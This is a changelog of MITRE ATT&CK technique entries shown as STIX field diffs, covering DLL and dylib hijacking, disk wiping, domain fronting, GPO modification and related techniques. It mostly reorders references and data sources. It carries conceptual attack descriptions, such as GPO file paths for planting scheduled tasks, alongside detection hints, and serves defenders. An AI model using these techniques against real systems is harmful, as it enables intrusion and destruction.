external_references[7]['description']Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.
external_references[7]['url']https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDNhttps://msdn.microsoft.com/en-US/library/aa375365
external_references[8]['source_name']Microsoft ManifestsFireEye DLL Search Order Hijacking
external_references[8]['description']Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.
external_references[8]['url']https://msdn.microsoft.com/en-US/library/aa375365https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesModule: Module Load
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye DLL Search Order Hijacking', 'description': 'Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html'}
x_mitre_data_sourcesModule: Module Load

[T1574.002] Hijack Execution Flow: DLL Side-Loading

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 04:07:48.912000+00:002023-03-30 21:01:47.241000+00:00
x_mitre_data_sources[0]File: File ModificationFile: File Creation
x_mitre_data_sources[1]File: File CreationProcess: Process Creation
x_mitre_data_sources[3]Process: Process CreationFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/641.html', 'external_id': 'CAPEC-641'}

[T1039] Data from Network Shared Drive

Current version: 1.3

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-16 13:08:03.209000+00:002023-03-30 21:01:35.611000+00:00
x_mitre_data_sources[0]Network Share: Network Share AccessCommand: Command Execution
x_mitre_data_sources[1]Network Traffic: Network Connection CreationNetwork Share: Network Share Access
x_mitre_data_sources[2]Command: Command ExecutionNetwork Traffic: Network Traffic Content
x_mitre_data_sources[4]Network Traffic: Network Traffic ContentNetwork Traffic: Network Connection Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/639.html', 'external_id': 'CAPEC-639'}

[T1078.001] Valid Accounts: Default Accounts

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesMicrosoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-70
values_changed
STIX FieldOld valueNew Value
modified2021-04-05 20:14:26.846000+00:002023-03-30 21:01:44.382000+00:00
external_references[1]['source_name']capecMicrosoft Local Accounts Feb 2019
external_references[1]['url']https://capec.mitre.org/data/definitions/70.htmlhttps://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
external_references[2]['source_name']Microsoft Local Accounts Feb 2019AWS Root User
external_references[2]['description']Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.
external_references[2]['url']https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accountshttps://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html
external_references[3]['source_name']AWS Root UserThreat Matrix for Kubernetes
external_references[3]['description']Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.
external_references[3]['url']https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.htmlhttps://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
external_references[4]['source_name']Threat Matrix for KubernetesMetasploit SSH Module
external_references[4]['description']Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.undefined. (n.d.). Retrieved April 12, 2019.
external_references[4]['url']https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Metasploit SSH Module', 'description': 'undefined. (n.d.). Retrieved April 12, 2019.', 'url': 'https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh'}

[T1498.001] Network Denial of Service: Direct Network Flood

Current version: 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 23:28:52.908000+00:002023-03-30 21:01:53.685000+00:00
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowSensor Health: Host Status
x_mitre_data_sources[1]Sensor Health: Host StatusNetwork Traffic: Network Traffic Flow
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/125.html', 'external_id': 'CAPEC-125'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/486.html', 'external_id': 'CAPEC-486'}

[T1561.001] Disk Wipe: Disk Content Wipe

Current version: 1.0


Old Description
New Description
t1Adversaries may erase the contents of storage devices on spet1Adversaries may erase the contents of storage devices on spe
>cific systems or in large numbers in a network to interrupt >cific systems or in large numbers in a network to interrupt 
>availability to system and network resources.  Adversaries m>availability to system and network resources.  Adversaries m
>ay partially or completely overwrite the contents of a stora>ay partially or completely overwrite the contents of a stora
>ge device rendering the data irrecoverable through the stora>ge device rendering the data irrecoverable through the stora
>ge interface.(Citation: Novetta Blockbuster)(Citation: Novet>ge interface.(Citation: Novetta Blockbuster)(Citation: Novet
>ta Blockbuster Destructive Malware)(Citation: DOJ Lazarus So>ta Blockbuster Destructive Malware)(Citation: DOJ Lazarus So
>ny 2018) Instead of wiping specific disk structures or files>ny 2018) Instead of wiping specific disk structures or files
>, adversaries with destructive intent may wipe arbitrary por>, adversaries with destructive intent may wipe arbitrary por
>tions of disk content. To wipe disk content, adversaries may>tions of disk content. To wipe disk content, adversaries may
> acquire direct access to the hard drive in order to overwri> acquire direct access to the hard drive in order to overwri
>te arbitrarily sized portions of disk with random data.(Cita>te arbitrarily sized portions of disk with random data.(Cita
>tion: Novetta Blockbuster Destructive Malware) Adversaries h>tion: Novetta Blockbuster Destructive Malware) Adversaries h
>ave been observed leveraging third-party drivers like [RawDi>ave also been observed leveraging third-party drivers like [
>sk](https://attack.mitre.org/software/S0364) to directly acc>RawDisk](https://attack.mitre.org/software/S0364) to directl
>ess disk content.(Citation: Novetta Blockbuster)(Citation: N>y access disk content.(Citation: Novetta Blockbuster)(Citati
>ovetta Blockbuster Destructive Malware) This behavior is dis>on: Novetta Blockbuster Destructive Malware) This behavior i
>tinct from [Data Destruction](https://attack.mitre.org/techn>s distinct from [Data Destruction](https://attack.mitre.org/
>iques/T1485) because sections of the disk are erased instead>techniques/T1485) because sections of the disk are erased in
> of individual files.  To maximize impact on the target orga>stead of individual files.  To maximize impact on the target
>nization in operations where network-wide availability inter> organization in operations where network-wide availability 
>ruption is the goal, malware used for wiping disk content ma>interruption is the goal, malware used for wiping disk conte
>y have worm-like features to propagate across a network by l>nt may have worm-like features to propagate across a network
>everaging additional techniques like [Valid Accounts](https:> by leveraging additional techniques like [Valid Accounts](h
>//attack.mitre.org/techniques/T1078), [OS Credential Dumping>ttps://attack.mitre.org/techniques/T1078), [OS Credential Du
>](https://attack.mitre.org/techniques/T1003), and [SMB/Windo>mping](https://attack.mitre.org/techniques/T1003), and [SMB/
>ws Admin Shares](https://attack.mitre.org/techniques/T1021/0>Windows Admin Shares](https://attack.mitre.org/techniques/T1
>02).(Citation: Novetta Blockbuster Destructive Malware)>021/002).(Citation: Novetta Blockbuster Destructive Malware)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-28 18:55:35.989000+00:002023-04-12 23:42:59.868000+00:00
descriptionAdversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Driver: Driver LoadDrive: Drive Modification
x_mitre_data_sources[1]Drive: Drive ModificationCommand: Command Execution
x_mitre_data_sources[2]Drive: Drive AccessDriver: Driver Load
x_mitre_data_sources[4]Command: Command ExecutionDrive: Drive Access
x_mitre_detectionLook for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity. For network infrastructure devices, collect AAA logging to monitor for `erase` commands that delete critical configuration files.

[T1090.004] Proxy: Domain Fronting

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesDavid Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-481
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 19:30:54.226000+00:002023-03-30 21:01:52.356000+00:00
external_references[1]['source_name']capecFifield Blocking Resistent Communication through domain fronting 2015
external_references[1]['url']https://capec.mitre.org/data/definitions/481.htmlhttp://www.icir.org/vern/papers/meek-PETS-2015.pdf
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Fifield Blocking Resistent Communication through domain fronting 2015', 'description': 'David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.', 'url': 'http://www.icir.org/vern/papers/meek-PETS-2015.pdf'}

[T1583.001] Acquire Infrastructure: Domains

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 19:21:38.441000+00:002023-03-30 21:01:37.379000+00:00
external_references[5]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[12]['url']https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/
external_references[13]['url']https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesDomain Name: Domain Registration
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/630.html', 'external_id': 'CAPEC-630'}
x_mitre_data_sourcesDomain Name: Domain Registration

[T1574.004] Hijack Execution Flow: Dylib Hijacking

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 04:08:30.203000+00:002023-03-30 21:01:39.601000+00:00
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/471.html', 'external_id': 'CAPEC-471'}

[T1574.006] Hijack Execution Flow: Dynamic Linker Hijacking

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesKerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020.
external_referencesThe Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-13
external_referencesCAPEC-640
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 19:55:18.453000+00:002023-03-30 21:01:40.146000+00:00
external_references[1]['source_name']capecMan LD.SO
external_references[1]['url']https://capec.mitre.org/data/definitions/13.htmlhttps://www.man7.org/linux/man-pages/man8/ld.so.8.html
external_references[2]['source_name']capecTLDP Shared Libraries
external_references[2]['url']https://capec.mitre.org/data/definitions/640.htmlhttps://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
external_references[3]['source_name']Man LD.SOApple Doco Archive Dynamic Libraries
external_references[3]['description']Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020.Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.
external_references[3]['url']https://www.man7.org/linux/man-pages/man8/ld.so.8.htmlhttps://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html
external_references[4]['source_name']TLDP Shared LibrariesBaeldung LD_PRELOAD
external_references[4]['description']The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.
external_references[4]['url']https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.htmlhttps://www.baeldung.com/linux/ld_preload-trick-what-is
external_references[5]['source_name']Apple Doco Archive Dynamic LibrariesCode Injection on Linux and macOS
external_references[5]['description']Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017.
external_references[5]['url']https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.htmlhttps://www.datawire.io/code-injection-on-linux-and-macos/
external_references[6]['source_name']Baeldung LD_PRELOADUninformed Needle
external_references[6]['description']baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.
external_references[6]['url']https://www.baeldung.com/linux/ld_preload-trick-what-ishttp://hick.org/code/skape/papers/needle.txt
external_references[7]['source_name']Code Injection on Linux and macOSPhrack halfdead 1997
external_references[7]['description']Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017.halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.
external_references[7]['url']https://www.datawire.io/code-injection-on-linux-and-macos/http://phrack.org/issues/51/8.html
external_references[8]['source_name']Uninformed NeedleBrown Exploiting Linkers
external_references[8]['description']skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.
external_references[8]['url']http://hick.org/code/skape/papers/needle.txthttp://www.nth-dimension.org.uk/pub/BTL.pdf
external_references[9]['source_name']Phrack halfdead 1997TheEvilBit DYLD_INSERT_LIBRARIES
external_references[9]['description']halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.
external_references[9]['url']http://phrack.org/issues/51/8.htmlhttps://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/
external_references[10]['source_name']Brown Exploiting LinkersTimac DYLD_INSERT_LIBRARIES
external_references[10]['description']Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.
external_references[10]['url']http://www.nth-dimension.org.uk/pub/BTL.pdfhttps://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/
external_references[11]['source_name']TheEvilBit DYLD_INSERT_LIBRARIESGabilondo DYLD_INSERT_LIBRARIES Catalina Bypass
external_references[11]['description']Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.
external_references[11]['url']https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191
x_mitre_data_sources[0]Module: Module LoadCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionFile: File Modification
x_mitre_data_sources[2]Process: Process CreationFile: File Creation
x_mitre_data_sources[3]File: File CreationModule: Module Load
x_mitre_data_sources[4]File: File ModificationProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Timac DYLD_INSERT_LIBRARIES', 'description': 'Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.', 'url': 'https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/'}
external_references{'source_name': 'Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass', 'description': 'Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.', 'url': 'https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191'}

[T1499] Endpoint Denial of Service

Current version: 1.1

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-12 14:48:40.313000+00:002023-03-30 21:01:44.038000+00:00
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/227.html', 'external_id': 'CAPEC-227'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/131.html', 'external_id': 'CAPEC-131'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/130.html', 'external_id': 'CAPEC-130'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/125.html', 'external_id': 'CAPEC-125'}

[T1133] External Remote Services

Current version: 2.4

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-16 19:15:22.221000+00:002023-03-30 21:01:36.318000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/555.html', 'external_id': 'CAPEC-555'}
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content

[T1083] File and Directory Discovery

Current version: 1.5

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-06 21:55:41.262000+00:002023-03-30 21:01:42.631000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: OS API Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/127.html', 'external_id': 'CAPEC-127'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/497.html', 'external_id': 'CAPEC-497'}
x_mitre_data_sourcesProcess: OS API Execution

[T1056.002] Input Capture: GUI Input Capture

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesSergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-659
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:05:20.136000+00:002023-03-30 21:01:48.279000+00:00
external_references[1]['source_name']capecOSX Malware Exploits MacKeeper
external_references[1]['url']https://capec.mitre.org/data/definitions/659.htmlhttps://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html
external_references[2]['source_name']OSX Malware Exploits MacKeeperLogRhythm Do You Trust Oct 2014
external_references[2]['description']Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.
external_references[2]['url']https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.htmlhttps://logrhythm.com/blog/do-you-trust-your-computer/
external_references[3]['source_name']LogRhythm Do You Trust Oct 2014OSX Keydnap malware
external_references[3]['description']Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.
external_references[3]['url']https://logrhythm.com/blog/do-you-trust-your-computer/https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
external_references[4]['source_name']OSX Keydnap malwareSpoofing credential dialogs
external_references[4]['description']Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.
external_references[4]['url']https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
external_references[5]['source_name']Spoofing credential dialogsEnigma Phishing for Credentials Jan 2015
external_references[5]['description']Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.
external_references[5]['url']https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesScript: Script Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Enigma Phishing for Credentials Jan 2015', 'description': 'Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.', 'url': 'https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/'}
x_mitre_data_sourcesScript: Script Execution

[T1484.001] Domain Policy Modification: Group Policy Modification

Current version: 1.0


Old Description
New Description
t1Adversaries may modify Group Policy Objects (GPOs) to subvert1Adversaries may modify Group Policy Objects (GPOs) to subver
>t the intended discretionary access controls for a domain, u>t the intended discretionary access controls for a domain, u
>sually with the intention of escalating privileges on the do>sually with the intention of escalating privileges on the do
>main. Group policy allows for centralized management of user>main. Group policy allows for centralized management of user
> and computer settings in Active Directory (AD). GPOs are co> and computer settings in Active Directory (AD). GPOs are co
>ntainers for group policy settings made up of files stored w>ntainers for group policy settings made up of files stored w
>ithin a predicable network path <code>\\&lt;DOMAIN&gt;\SYSVO>ithin a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\
>L\&lt;DOMAIN&gt;\Policies\</code>.(Citation: TechNet Group P>Policies\`.(Citation: TechNet Group Policy Basics)(Citation:
>olicy Basics)(Citation: ADSecurity GPO Persistence 2016)   L> ADSecurity GPO Persistence 2016)   Like other objects in AD
>ike other objects in AD, GPOs have access controls associate>, GPOs have access controls associated with them. By default
>d with them. By default all user accounts in the domain have> all user accounts in the domain have permission to read GPO
> permission to read GPOs. It is possible to delegate GPO acc>s. It is possible to delegate GPO access control permissions
>ess control permissions, e.g. write access, to specific user>, e.g. write access, to specific users or groups in the doma
>s or groups in the domain.  Malicious GPO modifications can >in.  Malicious GPO modifications can be used to implement ma
>be used to implement many other malicious behaviors such as >ny other malicious behaviors such as [Scheduled Task/Job](ht
>[Scheduled Task/Job](https://attack.mitre.org/techniques/T10>tps://attack.mitre.org/techniques/T1053), [Disable or Modify
>53), [Disable or Modify Tools](https://attack.mitre.org/tech> Tools](https://attack.mitre.org/techniques/T1562/001), [Ing
>niques/T1562/001), [Ingress Tool Transfer](https://attack.mi>ress Tool Transfer](https://attack.mitre.org/techniques/T110
>tre.org/techniques/T1105), [Create Account](https://attack.m>5), [Create Account](https://attack.mitre.org/techniques/T11
>itre.org/techniques/T1136), [Service Execution](https://atta>36), [Service Execution](https://attack.mitre.org/techniques
>ck.mitre.org/techniques/T1569/002),  and more.(Citation: ADS>/T1569/002),  and more.(Citation: ADSecurity GPO Persistence
>ecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)> 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abus
>(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandia>ing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citat
>nt M Trends 2016)(Citation: Microsoft Hacking Team Breach) S>ion: Microsoft Hacking Team Breach) Since GPOs can control s
>ince GPOs can control so many user and machine settings in t>o many user and machine settings in the AD environment, ther
>he AD environment, there are a great number of potential att>e are a great number of potential attacks that can stem from
>acks that can stem from this GPO abuse.(Citation: Wald0 Guid> this GPO abuse.(Citation: Wald0 Guide to GPOs)  For example
>e to GPOs)  For example, publicly available scripts such as >, publicly available scripts such as <code>New-GPOImmediateT
><code>New-GPOImmediateTask</code> can be leveraged to automa>ask</code> can be leveraged to automate the creation of a ma
>te the creation of a malicious [Scheduled Task/Job](https://>licious [Scheduled Task/Job](https://attack.mitre.org/techni
>attack.mitre.org/techniques/T1053) by modifying GPO settings>ques/T1053) by modifying GPO settings, in this case modifyin
>, in this case modifying <code>&lt;GPO_PATH&gt;\Machine\Pref>g <code>&lt;GPO_PATH&gt;\Machine\Preferences\ScheduledTasks\
>erences\ScheduledTasks\ScheduledTasks.xml</code>.(Citation: >ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Ci
>Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissio>tation: Harmj0y Abusing GPO Permissions) In some cases an ad
>ns) In some cases an adversary might modify specific user ri>versary might modify specific user rights like SeEnableDeleg
>ghts like SeEnableDelegationPrivilege, set in <code>&lt;GPO_>ationPrivilege, set in <code>&lt;GPO_PATH&gt;\MACHINE\Micros
>PATH&gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</c>oft\Windows NT\SecEdit\GptTmpl.inf</code>, to achieve a subt
>ode>, to achieve a subtle AD backdoor with complete control >le AD backdoor with complete control of the domain because t
>of the domain because the user account under the adversary's>he user account under the adversary's control would then be 
> control would then be able to modify GPOs.(Citation: Harmj0>able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPri
>y SeEnableDelegationPrivilege Right)>vilege Right)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:52:24.315000+00:002023-01-06 12:44:15.707000+00:00
